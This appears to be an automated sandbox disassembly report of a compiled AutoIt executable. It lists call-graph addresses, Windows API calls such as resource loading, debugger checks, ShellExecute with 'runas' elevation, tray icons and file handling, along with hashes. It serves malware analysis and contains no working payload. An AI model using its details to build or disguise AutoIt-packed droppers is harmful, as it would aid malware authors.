7ff74d07c9f5 94648->94649 94650 7ff74d036740 CreateStreamOnHGlobal 94648->94650 94658 7ff74d036602 94648->94658 94827 7ff74d0b2e00 45 API calls 94649->94827 94651 7ff74d036759 FindResourceExW 94650->94651 94650->94658 94651->94658 94653 7ff74d07c97e LoadResource 94654 7ff74d07c997 SizeofResource 94653->94654 94653->94658 94657 7ff74d07c9ae LockResource 94654->94657 94654->94658 94655 7ff74d0367d8 45 API calls 94655->94658 94656 7ff74d07c9fd 94659 7ff74d0367d8 45 API calls 94656->94659 94657->94658 94658->94653 94658->94655 94658->94656 94660 7ff74d0366e8 94658->94660 94659->94660 94660->94533 94662 7ff74d07ca6c 94661->94662 94663 7ff74d0367f7 94661->94663 94828 7ff74d064c5c 94663->94828 94666 7ff74d0b240c 94847 7ff74d0b2200 94666->94847 94668 7ff74d0b2430 94668->94541 94686 7ff74d06b9bc EnterCriticalSection 94669->94686 94671 7ff74d06fecb 94672 7ff74d06ff54 18 API calls 94671->94672 94673 7ff74d06fed6 94672->94673 94674 7ff74d06ba10 _isindst LeaveCriticalSection 94673->94674 94675 7ff74d064879 94674->94675 94675->94633 94675->94634 94687 7ff74d070040 94676->94687 94678 7ff74d07035e 94678->94637 94681->94624 94682->94631 94683->94631 94684->94631 94692 7ff74d07007d try_get_function 94687->94692 94689 7ff74d0702de 94706 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94689->94706 94691 7ff74d07021a 94691->94678 94699 7ff74d077738 94691->94699 94698 7ff74d070211 94692->94698 94702 7ff74d05db68 37 API calls 4 library calls 94692->94702 94694 7ff74d070277 94694->94698 94703 7ff74d05db68 37 API calls 4 library calls 94694->94703 94696 7ff74d07029a 94696->94698 94704 7ff74d05db68 37 API calls 4 library calls 94696->94704 94698->94691 94705 7ff74d0655d4 15 API calls abort 94698->94705 94707 7ff74d076d04 94699->94707 94702->94694 94703->94696 94704->94698 94705->94689 94706->94691 94708 7ff74d076d28 94707->94708 94712 7ff74d076d40 94707->94712 94761 7ff74d0655d4 15 API calls abort 94708->94761 94710 7ff74d076d2d 94762 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94710->94762 94711 7ff74d076d6d 94718 7ff74d077348 94711->94718 94712->94708 94712->94711 94716 7ff74d076d39 94716->94678 94764 7ff74d077078 94718->94764 94721 7ff74d0773bc 94796 7ff74d0655b4 15 API calls abort 94721->94796 94722 7ff74d0773d3 94784 7ff74d06e418 94722->94784 94725 7ff74d0773c1 94797 7ff74d0655d4 15 API calls abort 94725->94797 94727 7ff74d0773f7 CreateFileW 94729 7ff74d0774eb GetFileType 94727->94729 94730 7ff74d077469 94727->94730 94728 7ff74d0773df 94798 7ff74d0655b4 15 API calls abort 94728->94798 94734 7ff74d077549 94729->94734 94735 7ff74d0774f8 GetLastError 94729->94735 94733 7ff74d0774b8 GetLastError 94730->94733 94738 7ff74d077478 CreateFileW 94730->94738 94800 7ff74d065564 15 API calls 2 library calls 94733->94800 94803 7ff74d06e334 16 API calls 2 library calls 94734->94803 94801 7ff74d065564 15 API calls 2 library calls 94735->94801 94736 7ff74d0773e4 94799 7ff74d0655d4 15 API calls abort 94736->94799 94738->94729 94738->94733 94741 7ff74d077507 CloseHandle 94741->94725 94743 7ff74d077539 94741->94743 94802 7ff74d0655d4 15 API calls abort 94743->94802 94745 7ff74d077568 94746 7ff74d0775b5 94745->94746 94804 7ff74d077284 67 API calls 2 library calls 94745->94804 94751 7ff74d0775ec 94746->94751 94805 7ff74d076de4 67 API calls 4 library calls 94746->94805 94747 7ff74d07753e 94747->94725 94750 7ff74d0775e8 94750->94751 94752 7ff74d0775fe 94750->94752 94806 7ff74d0704b8 94751->94806 94754 7ff74d076d95 94752->94754 94755 7ff74d077681 CloseHandle CreateFileW 94752->94755 94754->94716 94763 7ff74d06e3f4 LeaveCriticalSection 94754->94763 94756 7ff74d0776f9 94755->94756 94757 7ff74d0776cb GetLastError 94755->94757 94756->94754 94821 7ff74d065564 15 API calls 2 library calls 94757->94821 94759 7ff74d0776d8 94822 7ff74d06e548 16 API calls 2 library calls 94759->94822 94761->94710 94762->94716 94765 7ff74d0770a4 94764->94765 94772 7ff74d0770be 94764->94772 94766 7ff74d0655d4 _set_fmode 15 API calls 94765->94766 94765->94772 94767 7ff74d0770b3 94766->94767 94768 7ff74d06b164 _invalid_parameter_noinfo 31 API calls 94767->94768 94768->94772 94769 7ff74d07718c 94771 7ff74d062554 31 API calls 94769->94771 94782 7ff74d0771ec 94769->94782 94770 7ff74d07713b 94770->94769 94773 7ff74d0655d4 _set_fmode 15 API calls 94770->94773 94774 7ff74d0771e8 94771->94774 94772->94770 94775 7ff74d0655d4 _set_fmode 15 API calls 94772->94775 94776 7ff74d077181 94773->94776 94777 7ff74d07726b 94774->94777 94774->94782 94778 7ff74d077130 94775->94778 94779 7ff74d06b164 _invalid_parameter_noinfo 31 API calls 94776->94779 94780 7ff74d06b184 _isindst 16 API calls 94777->94780 94781 7ff74d06b164 _invalid_parameter_noinfo 31 API calls 94778->94781 94779->94769 94783 7ff74d077280 94780->94783 94781->94770 94782->94721 94782->94722 94785 7ff74d06b9bc _isindst EnterCriticalSection 94784->94785 94793 7ff74d06e43b 94785->94793 94786 7ff74d06e487 94788 7ff74d06ba10 _isindst LeaveCriticalSection 94786->94788 94787 7ff74d06e464 94789 7ff74d06e170 16 API calls 94787->94789 94790 7ff74d06e52a 94788->94790 94791 7ff74d06e469 94789->94791 94790->94727 94790->94728 94791->94786 94795 7ff74d06e310 wprintf EnterCriticalSection 94791->94795 94792 7ff74d06e4c2 EnterCriticalSection 94792->94786 94794 7ff74d06e4d1 LeaveCriticalSection 94792->94794 94793->94786 94793->94787 94793->94792 94794->94793 94795->94786 94796->94725 94797->94754 94798->94736 94799->94725 94800->94725 94801->94741 94802->94747 94803->94745 94804->94746 94805->94750 94807 7ff74d06e604 31 API calls 94806->94807 94809 7ff74d0704cc 94807->94809 94808 7ff74d0704d2 94810 7ff74d06e548 16 API calls 94808->94810 94809->94808 94811 7ff74d07050c 94809->94811 94812 7ff74d06e604 31 API calls 94809->94812 94814 7ff74d070534 94810->94814 94811->94808 94813 7ff74d06e604 31 API calls 94811->94813 94815 7ff74d0704ff 94812->94815 94816 7ff74d070518 CloseHandle 94813->94816 94817 7ff74d070560 94814->94817 94820 7ff74d065564 fread_s 15 API calls 94814->94820 94818 7ff74d06e604 31 API calls 94815->94818 94816->94808 94819 7ff74d070525 GetLastError 94816->94819 94817->94754 94818->94811 94819->94808 94820->94817 94821->94759 94822->94756 94824 7ff74d036d2c LoadLibraryA 94823->94824 94825 7ff74d036ce3 94823->94825 94824->94825 94826 7ff74d036d41 GetProcAddress 94824->94826 94825->94642 94825->94643 94826->94825 94827->94656 94831 7ff74d064c7c 94828->94831 94832 7ff74d064ca6 94831->94832 94833 7ff74d03680a 94831->94833 94832->94833 94834 7ff74d064cd7 94832->94834 94835 7ff74d064cb5 __scrt_get_show_window_mode 94832->94835 94833->94666 94846 7ff74d05df54 EnterCriticalSection 94834->94846 94844 7ff74d0655d4 15 API calls abort 94835->94844 94840 7ff74d064cca 94845 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94840->94845 94844->94840 94845->94833 94850 7ff74d0647bc 94847->94850 94849 7ff74d0b2210 94849->94668 94853 7ff74d064724 94850->94853 94854 7ff74d064746 94853->94854 94855 7ff74d064732 94853->94855 94858 7ff74d064742 94854->94858 94863 7ff74d06bef8 6 API calls __vcrt_uninitialize_ptd 94854->94863 94861 7ff74d0655d4 15 API calls abort 94855->94861 94857 7ff74d064737 94862 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94857->94862 94858->94849 94861->94857 94862->94858 94863->94858 94865 7ff74d041a48 94864->94865 94866 7ff74d041c5f 94864->94866 94871 7ff74d041a90 94865->94871 94881 7ff74d055114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94865->94881 94866->94544 94871->94544 94876 7ff74d03f1ce 94875->94876 94878 7ff74d03f1d8 94875->94878 94877 7ff74d041a30 45 API calls 94876->94877 94877->94878 94878->94554 94879->94552 94880->94548 94882->94567 94883->94572 94884->94566 94885->94573 94886->94577 94887->94587 94888->94586 94890 7ff74d0b2bae 94889->94890 94891 7ff74d0367d8 45 API calls 94890->94891 94892 7ff74d0b240c 32 API calls 94890->94892 94893 7ff74d0b29da 94890->94893 94891->94890 94892->94890 94893->94593 94893->94606 94895 7ff74d0b1d61 94894->94895 94896 7ff74d0b1d71 94894->94896 94897 7ff74d0648e0 89 API calls 94895->94897 94898 7ff74d0b1dbf 94896->94898 94899 7ff74d0648e0 89 API calls 94896->94899 94904 7ff74d0b1d7a 94896->94904 94897->94896 94921 7ff74d0b2038 94898->94921 94900 7ff74d0b1d9e 94899->94900 94900->94898 94903 7ff74d0b1da7 94900->94903 94902 7ff74d0b1df5 94905 7ff74d0b1df9 94902->94905 94906 7ff74d0b1e1c 94902->94906 94903->94904 94933 7ff74d064970 94903->94933 94904->94606 94908 7ff74d0b1e07 94905->94908 94909 7ff74d064970 62 API calls 94905->94909 94911 7ff74d0b1e4a 94906->94911 94912 7ff74d0b1e2a 94906->94912 94908->94904 94910 7ff74d064970 62 API calls 94908->94910 94909->94908 94910->94904 94925 7ff74d0b1e88 94911->94925 94913 7ff74d0b1e38 94912->94913 94915 7ff74d064970 62 API calls 94912->94915 94913->94904 94916 7ff74d064970 62 API calls 94913->94916 94915->94913 94916->94904 94917 7ff74d0b1e52 94918 7ff74d0b1e68 94917->94918 94919 7ff74d064970 62 API calls 94917->94919 94918->94904 94920 7ff74d064970 62 API calls 94918->94920 94919->94918 94920->94904 94922 7ff74d0b2069 94921->94922 94924 7ff74d0b2056 memcpy_s 94921->94924 94923 7ff74d064c5c _fread_nolock 45 API calls 94922->94923 94923->94924 94924->94902 94926 7ff74d0b1fb0 94925->94926 94929 7ff74d0b1eaa 94925->94929 94930 7ff74d0b1fd3 94926->94930 94947 7ff74d062a04 60 API calls 2 library calls 94926->94947 94927 7ff74d0b1bd0 45 API calls 94927->94929 94929->94926 94929->94927 94929->94930 94945 7ff74d0b1c9c 45 API calls 94929->94945 94946 7ff74d0b20cc 60 API calls 94929->94946 94930->94917 94934 7ff74d06498e 94933->94934 94935 7ff74d0649a3 94933->94935 94949 7ff74d0655d4 15 API calls abort 94934->94949 94944 7ff74d06499e 94935->94944 94948 7ff74d05df54 EnterCriticalSection 94935->94948 94937 7ff74d064993 94950 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94937->94950 94939 7ff74d0649b9 94941 7ff74d0648ec 60 API calls 94939->94941 94942 7ff74d0649c2 94941->94942 94943 7ff74d05df60 fflush LeaveCriticalSection 94942->94943 94943->94944 94944->94904 94945->94929 94946->94929 94947->94930 94949->94937 94950->94944 94952 7ff74d078f90 wcsftime 94951->94952 94953 7ff74d033ec4 GetLongPathNameW 94952->94953 94954 7ff74d037cf4 4 API calls 94953->94954 94955 7ff74d033eed 94954->94955 94956 7ff74d034074 94955->94956 94957 7ff74d039640 4 API calls 94956->94957 94958 7ff74d03408e 94957->94958 94959 7ff74d0356d4 5 API calls 94958->94959 94960 7ff74d03409b 94959->94960 94961 7ff74d0340a7 94960->94961 94966 7ff74d07bada 94960->94966 94962 7ff74d034680 4 API calls 94961->94962 94964 7ff74d0340b5 94962->94964 94999 7ff74d0340e8 94964->94999 94967 7ff74d07bb0f 94966->94967 95003 7ff74d051ad0 CompareStringW 94966->95003 94968 7ff74d0340cb Concurrency::wait 94968->94477 94970 7ff74d036460 105 API calls 94969->94970 94971 7ff74d0363e5 94970->94971 94972 7ff74d07c656 94971->94972 94973 7ff74d036460 105 API calls 94971->94973 94974 7ff74d0b2948 90 API calls 94972->94974 94975 7ff74d036400 94973->94975 94976 7ff74d07c66e 94974->94976 94975->94972 94979 7ff74d036408 94975->94979 94977 7ff74d07c672 94976->94977 94978 7ff74d07c690 94976->94978 94980 7ff74d03652c 63 API calls 94977->94980 94981 7ff74d054c68 4 API calls 94978->94981 94982 7ff74d07c67b 94979->94982 94983 7ff74d036414 94979->94983 94980->94982 94998 7ff74d07c6dd Concurrency::wait 94981->94998 95005 7ff74d0ac5c8 77 API calls wprintf 94982->95005 95004 7ff74d03e774 143 API calls Concurrency::wait 94983->95004 94986 7ff74d07c68a 94986->94978 94987 7ff74d036438 94987->94470 94988 7ff74d07c895 94989 7ff74d03652c 63 API calls 94988->94989 94997 7ff74d07c8a9 94989->94997 94994 7ff74d03ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94994->94998 94997->94988 95011 7ff74d0a76d8 77 API calls 3 library calls 94997->95011 94998->94988 94998->94994 94998->94997 95006 7ff74d0a7400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94998->95006 95007 7ff74d0a730c 39 API calls 94998->95007 95008 7ff74d0b0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94998->95008 95009 7ff74d03b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94998->95009 95010 7ff74d039940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94998->95010 95000 7ff74d034107 94999->95000 95002 7ff74d034130 memcpy_s 94999->95002 95001 7ff74d054c68 4 API calls 95000->95001 95001->95002 95002->94968 95003->94966 95004->94987 95005->94986 95006->94998 95007->94998 95008->94998 95009->94998 95010->94998 95011->94997 95013 7ff74d039762 95012->95013 95018 7ff74d03988d 95012->95018 95014 7ff74d054c68 4 API calls 95013->95014 95013->95018 95015 7ff74d039791 95014->95015 95016 7ff74d054c68 4 API calls 95015->95016 95021 7ff74d03981c 95016->95021 95018->94482 95021->95018 95024 7ff74d03abe0 81 API calls 2 library calls 95021->95024 95025 7ff74d039940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95021->95025 95026 7ff74d03b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95021->95026 95022->94484 95023->94486 95024->95021 95025->95021 95026->95021 95027->94497 95028 7ff74d035dec 95029 7ff74d035df4 95028->95029 95030 7ff74d035e98 95029->95030 95031 7ff74d035e28 95029->95031 95052 7ff74d035e96 95029->95052 95033 7ff74d07c229 95030->95033 95034 7ff74d035e9e 95030->95034 95035 7ff74d035f21 PostQuitMessage 95031->95035 95036 7ff74d035e35 95031->95036 95032 7ff74d035e6b DefWindowProcW 95056 7ff74d035e7c 95032->95056 95084 7ff74d04ede4 8 API calls 95033->95084 95037 7ff74d035ecc SetTimer RegisterWindowMessageW 95034->95037 95038 7ff74d035ea5 95034->95038 95035->95056 95039 7ff74d035e40 95036->95039 95040 7ff74d07c2af 95036->95040 95044 7ff74d035efc CreatePopupMenu 95037->95044 95037->95056 95042 7ff74d035eae KillTimer 95038->95042 95043 7ff74d07c1b8 95038->95043 95045 7ff74d035e49 95039->95045 95046 7ff74d035f2b 95039->95046 95096 7ff74d0aa40c 16 API calls __scrt_get_show_window_mode 95040->95096 95070 7ff74d035d88 95042->95070 95049 7ff74d07c1bd 95043->95049 95050 7ff74d07c1f7 MoveWindow 95043->95050 95044->95056 95045->95052 95060 7ff74d035f0b 95045->95060 95061 7ff74d035e5f 95045->95061 95074 7ff74d054610 95046->95074 95048 7ff74d07c255 95085 7ff74d052c44 47 API calls Concurrency::wait 95048->95085 95057 7ff74d07c1e4 SetFocus 95049->95057 95058 7ff74d07c1c2 95049->95058 95050->95056 95052->95032 95053 7ff74d07c2c3 95053->95032 95053->95056 95057->95056 95058->95061 95062 7ff74d07c1cb 95058->95062 95082 7ff74d035f3c 26 API calls __scrt_get_show_window_mode 95060->95082 95061->95032 95067 7ff74d035d88 Shell_NotifyIconW 95061->95067 95083 7ff74d04ede4 8 API calls 95062->95083 95066 7ff74d035f1f 95066->95056 95068 7ff74d07c280 95067->95068 95086 7ff74d036258 95068->95086 95071 7ff74d035d99 __scrt_get_show_window_mode 95070->95071 95072 7ff74d035de4 95070->95072 95073 7ff74d035db8 Shell_NotifyIconW 95071->95073 95081 7ff74d037098 DeleteObject DestroyWindow Concurrency::wait 95072->95081 95073->95072 95075 7ff74d0546db 95074->95075 95076 7ff74d05461a __scrt_get_show_window_mode 95074->95076 95075->95056 95097 7ff74d0372c8 95076->95097 95078 7ff74d0546a2 KillTimer SetTimer 95078->95075 95079 7ff74d054660 95079->95078 95080 7ff74d09aaa1 Shell_NotifyIconW 95079->95080 95080->95078 95081->95056 95082->95066 95083->95056 95084->95048 95085->95061 95087 7ff74d036287 __scrt_get_show_window_mode 95086->95087 95121 7ff74d0361c4 95087->95121 95090 7ff74d03632d 95092 7ff74d03634e Shell_NotifyIconW 95090->95092 95093 7ff74d07c644 Shell_NotifyIconW 95090->95093 95094 7ff74d0372c8 6 API calls 95092->95094 95095 7ff74d036365 95094->95095 95095->95052 95096->95053 95098 7ff74d0372f4 95097->95098 95117 7ff74d0373bc Concurrency::wait 95097->95117 95099 7ff74d0398e8 4 API calls 95098->95099 95100 7ff74d037303 95099->95100 95101 7ff74d07cdfc LoadStringW 95100->95101 95102 7ff74d037310 95100->95102 95104 7ff74d07ce1e 95101->95104 95103 7ff74d037cf4 4 API calls 95102->95103 95105 7ff74d037324 95103->95105 95108 7ff74d03e0a8 4 API calls 95104->95108 95106 7ff74d037336 95105->95106 95107 7ff74d07ce30 95105->95107 95106->95104 95109 7ff74d037343 95106->95109 95120 7ff74d037c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95107->95120 95112 7ff74d03734f wcscpy __scrt_get_show_window_mode 95108->95112 95119 7ff74d037c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95109->95119 95116 7ff74d0373a3 Shell_NotifyIconW 95112->95116 95113 7ff74d07ce3c 95113->95112 95114 7ff74d0371f8 4 API calls 95113->95114 95115 7ff74d07ce63 95114->95115 95118 7ff74d0371f8 4 API calls 95115->95118 95116->95117 95117->95079 95118->95112 95119->95112 95120->95113 95122 7ff74d07c5f8 95121->95122 95123 7ff74d0361e0 95121->95123 95122->95123 95124 7ff74d07c602 DestroyIcon 95122->95124 95123->95090 95125 7ff74d0aad94 39 API calls wcsftime 95123->95125 95124->95123 95125->95090 95126 7ff74d0447e1 95127 7ff74d044d57 95126->95127 95131 7ff74d0447f2 95126->95131 95157 7ff74d03ee20 5 API calls Concurrency::wait 95127->95157 95129 7ff74d044d66 95158 7ff74d03ee20 5 API calls Concurrency::wait 95129->95158 95131->95129 95132 7ff74d044df3 95131->95132 95133 7ff74d044862 95131->95133 95159 7ff74d0b0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95132->95159 95135 7ff74d0466c0 300 API calls 95133->95135 95144 7ff74d043c80 95133->95144 95135->95144 95136 7ff74d0905be 95161 7ff74d0b34e4 77 API calls 3 library calls 95136->95161 95137 7ff74d055114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95137->95144 95138 7ff74d043dde 95140 7ff74d044a8f 95145 7ff74d044aa9 95140->95145 95147 7ff74d08fefe 95140->95147 95151 7ff74d044ac0 95140->95151 95142 7ff74d0905d1 95143 7ff74d044fe7 95148 7ff74d03e0a8 4 API calls 95143->95148 95144->95136 95144->95137 95144->95138 95144->95140 95144->95143 95144->95145 95149 7ff74d03e0a8 4 API calls 95144->95149 95153 7ff74d054f0c 34 API calls __scrt_initialize_thread_safe_statics 95144->95153 95154 7ff74d0550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 95144->95154 95155 7ff74d039640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95144->95155 95156 7ff74d045360 300 API calls Concurrency::wait 95144->95156 95160 7ff74d0b34e4 77 API calls 3 library calls 95144->95160 95146 7ff74d03e0a8 4 API calls 95145->95146 95145->95151 95146->95138 95150 7ff74d03e0a8 4 API calls 95147->95150 95148->95138 95149->95144 95150->95151 95153->95144 95154->95144 95155->95144 95156->95144 95157->95129 95158->95132 95159->95144 95160->95144 95161->95142

                                                                                          Executed Functions

                                                                                          Function 00007FF74D0337B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D0337F2
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033807
                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D03388D
                                                                                            • Part of subcall function 00007FF74D033F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF74D0338BF,?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033FFD
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D033924
                                                                                          • MessageBoxA.USER32 ref: 00007FF74D07B888
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D07B8E1
                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,00007FF74D033785), ref: 00007FF74D07B968
                                                                                          • ShellExecuteW.SHELL32 ref: 00007FF74D07B98F
                                                                                            • Part of subcall function 00007FF74D033B84: GetSysColorBrush.USER32 ref: 00007FF74D033B9E
                                                                                            • Part of subcall function 00007FF74D033B84: LoadCursorW.USER32 ref: 00007FF74D033BAE
                                                                                            • Part of subcall function 00007FF74D033B84: LoadIconW.USER32 ref: 00007FF74D033BC3
                                                                                            • Part of subcall function 00007FF74D033B84: LoadIconW.USER32 ref: 00007FF74D033BDC
                                                                                            • Part of subcall function 00007FF74D033B84: LoadIconW.USER32 ref: 00007FF74D033BF5
                                                                                            • Part of subcall function 00007FF74D033B84: LoadImageW.USER32 ref: 00007FF74D033C21
                                                                                            • Part of subcall function 00007FF74D033B84: RegisterClassExW.USER32 ref: 00007FF74D033C85
                                                                                            • Part of subcall function 00007FF74D033CBC: CreateWindowExW.USER32 ref: 00007FF74D033D0C
                                                                                            • Part of subcall function 00007FF74D033CBC: CreateWindowExW.USER32 ref: 00007FF74D033D5F
                                                                                            • Part of subcall function 00007FF74D033CBC: ShowWindow.USER32 ref: 00007FF74D033D75
                                                                                            • Part of subcall function 00007FF74D036258: Shell_NotifyIconW.SHELL32 ref: 00007FF74D036350
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                          • API String ID: 1593035822-3287110873
                                                                                          • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                          • Instruction ID: 730ae8579dde39b83d179a7f8b6cae414c1b66c9f911cb3f3f2953d05d819c01
                                                                                          • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                          • Instruction Fuzzy Hash: B6713B21A1C683D6EA20BB20E9841F9E361BF45344FC50636D9CD175B6FEBDE649CB20
                                                                                          Function 00007FF74D036580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 352 7ff74d036580-7ff74d0365fc call 7ff74d054c68 call 7ff74d036c98 call 7ff74d055d00 359 7ff74d036737-7ff74d03673a 352->359 360 7ff74d036602-7ff74d036606 352->360 361 7ff74d07c9f5-7ff74d07c9fd call 7ff74d0b2e00 359->361 362 7ff74d036740-7ff74d036753 CreateStreamOnHGlobal 359->362 363 7ff74d03660c-7ff74d036617 call 7ff74d065514 360->363 364 7ff74d07ca03-7ff74d07ca1e 360->364 361->364 362->360 365 7ff74d036759-7ff74d036777 FindResourceExW 362->365 373 7ff74d03661b-7ff74d03664e call 7ff74d0367d8 363->373 374 7ff74d07ca27-7ff74d07ca60 call 7ff74d036810 call 7ff74d0367d8 364->374 365->360 368 7ff74d03677d 365->368 372 7ff74d07c97e-7ff74d07c991 LoadResource 368->372 372->360 375 7ff74d07c997-7ff74d07c9a8 SizeofResource 372->375 382 7ff74d0366e8 373->382 383 7ff74d036654-7ff74d03665f 373->383 385 7ff74d0366ee 374->385 394 7ff74d07ca66 374->394 375->360 378 7ff74d07c9ae-7ff74d07c9ba LockResource 375->378 378->360 381 7ff74d07c9c0-7ff74d07c9f0 378->381 381->360 382->385 386 7ff74d0366ae-7ff74d0366b2 383->386 387 7ff74d036661-7ff74d03666f 383->387 391 7ff74d0366f1-7ff74d036715 385->391 386->382 388 7ff74d0366b4-7ff74d0366cf call 7ff74d036810 386->388 392 7ff74d036670-7ff74d03667d 387->392 388->373 395 7ff74d036729-7ff74d036736 391->395 396 7ff74d036717-7ff74d036724 call 7ff74d054c24 * 2 391->396 397 7ff74d036680-7ff74d03668f 392->397 394->391 396->395 398 7ff74d036691-7ff74d036695 397->398 399 7ff74d0366d4-7ff74d0366dd 397->399 398->374 403 7ff74d03669b-7ff74d0366a8 398->403 404 7ff74d036782-7ff74d03678c 399->404 405 7ff74d0366e3-7ff74d0366e6 399->405 403->392 407 7ff74d0366aa 403->407 408 7ff74d036797-7ff74d0367a1 404->408 409 7ff74d03678e 404->409 405->398 407->386 411 7ff74d0367ce 408->411 412 7ff74d0367a3-7ff74d0367ad 408->412 409->408 411->372 413 7ff74d0367af-7ff74d0367bb 412->413 414 7ff74d0367c6 412->414 413->397 415 7ff74d0367c1 413->415 414->411 415->414
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                          • String ID: AU3!$EA06$SCRIPT
                                                                                          • API String ID: 3051347437-2925976212
                                                                                          • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                          • Instruction ID: 48765a2920f2c4fb766031c4172e8eb36678a4ab3b653212e55733a2297afad1
                                                                                          • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                          • Instruction Fuzzy Hash: 8391CF72B0D651C6EB20FB21E558ABCABA0BB45BC4FC14139DE9D477A5EF79E4048320
                                                                                          Function 00007FF74D051D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
